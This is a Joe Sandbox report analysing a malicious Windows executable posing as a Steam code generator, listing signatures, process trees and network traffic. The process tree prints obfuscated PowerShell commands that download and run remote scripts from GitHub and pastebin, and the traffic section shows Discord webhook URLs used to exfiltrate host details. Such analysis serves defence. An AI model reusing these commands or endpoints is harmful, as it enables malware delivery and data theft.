Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
steamcodegenerator.exe

Overview

General Information

Sample name:steamcodegenerator.exe
Analysis ID:1534102
MD5:d4f1751389516a3dfac98551142cb153
SHA1:f362178e1ecd3eac536b666e89c2aa5663109116
SHA256:eb727ad773925864801802b58b3060cfb1a0c18c1be78c8f9e6fc1d2840b19af
Tags:exeNeth3Nuser-JAMESWT_MHT
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64
  • steamcodegenerator.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\steamcodegenerator.exe" MD5: D4F1751389516A3DFAC98551142CB153)
    • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7628 cmdline: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8168 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 7268 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4080 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 5236 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 1856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6016 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x902e:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stm[1].txtWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x66ff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
SourceRuleDescriptionAuthorStrings
00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x66ff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000000.00000002.3629903861.0000022AF4D00000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x16c5f:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
SourceRuleDescriptionAuthorStrings
amsi64_5660.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_7248.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\steamcodegenerator.exe", ParentImage: C:\Users\user\Desktop\steamcodegenerator.exe, ParentProcessId: 7500, ParentProcessName: steamcodegenerator.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, ProcessId: 7628, ProcessName: powershell.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7744, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\steamcodegenerator.exe", ParentImage: C:\Users\user\Desktop\steamcodegenerator.exe, ParentProcessId: 7500, ParentProcessName: steamcodegenerator.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, ProcessId: 7628, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T16:00:08.497087+020028576591A Network Trojan was detected192.168.2.449749162.159.138.232443TCP
2024-10-15T16:00:16.360221+020028576591A Network Trojan was detected192.168.2.449763162.159.138.232443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:59:53.331844+020028576581A Network Trojan was detected192.168.2.449742162.159.138.232443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: steamcodegenerator.exeReversingLabs: Detection: 42%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: steamcodegenerator.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb&& source: steamcodegenerator.exe, 00000000.00000002.3629938089.0000022AF4E20000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629977699.0000022AF4E54000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: dC:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb source: steamcodegenerator.exe, 00000000.00000002.3629938089.0000022AF4E20000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629977699.0000022AF4E54000.00000002.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF663560478 FindFirstFileExW,0_2_00007FF663560478

Networking

barindex
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.4:49749 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.4:49763 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.4:49742 -> 162.159.138.232:443
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 213Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 298Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 298Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /user-attachments/files/17267811/stm.txt HTTP/1.1User-Agent: DownloaderHost: github.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /github-production-repository-file-5c1aeb/867932512/17267811?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241015%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241015T135927Z&X-Amz-Expires=300&X-Amz-Signature=8a42f0840dba3c62020dad0419913b6620b38691d3ca1b89b59ca471c19fa727&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dstm.txt&response-content-type=text%2Fplain HTTP/1.1User-Agent: DownloaderCache-Control: no-cacheHost: objects.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 213Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 13:59:53 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000794x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hWnV7TPvkg5LZKvrTXlOvT%2BEdxRSZVjQR2VHBvQhjXYCguoQolUzOZJtES0lyG%2BnICdJwdZcwfOQEn97tnR8NAh1SKuQGHTtgI%2FOJJHa3khkNkjOBTA3SH4bdh29"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=b96900f5ee5ff634769fa70e31a8093c5cc2c686-1729000793; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=B9oNm1iH5MaqkqTXcdybFvpTlS5n6AwSsI_dOXK08Wk-1729000793263-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d30550d4c198d2d-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:08 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000809x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4y9gj4sWdq%2By0jEQwDG6uSzZLfzSQLJs6deNAx5PdrOB87WoZAU0lF29ALF%2Fb28JQcPnLPKT4f6HKjVVNXTMsTjMVSKMCgEkjbQ2y%2BU7MHWSvJH7VYbbjIKrGoWV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=898bd1d6d1178ff7245a151efa26800a53bbff85-1729000808; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=shRMVpCMnQJcd9oFhWDOKkHJPOxlMBHoMx_v_HmOv2k-1729000808433-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d30556bdcc53455-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:16 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000817x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5jjzbRDm%2B2SlpjKVS72i7IPSdiTMsScsmN0thaBYTgtj6qqodAYw7O7hfydAkKesLwdKFKeexRvA9ISH6R%2BRd4gD6CE7yn1CKxr%2BAdg8y0Q8Vn6c%2B5D5xu69Z3mg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=e316ba9d782cc8a8d64ff500cb6e6c4c929f0dd5-1729000816; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=6UMiXvDrHMMRL.7XfRyxsGJQ1gU6UcIilxJInvvqYJg-1729000816294-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d30559cfb90e867-DFW
Source: powershell.exe, 00000002.00000002.1958904116.0000025E901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943654645.0000025E818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1943654645.0000025E80232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1943654645.0000025E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1943654645.0000025E81632000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000002.00000002.1943654645.0000025E80232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1943654645.0000025E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
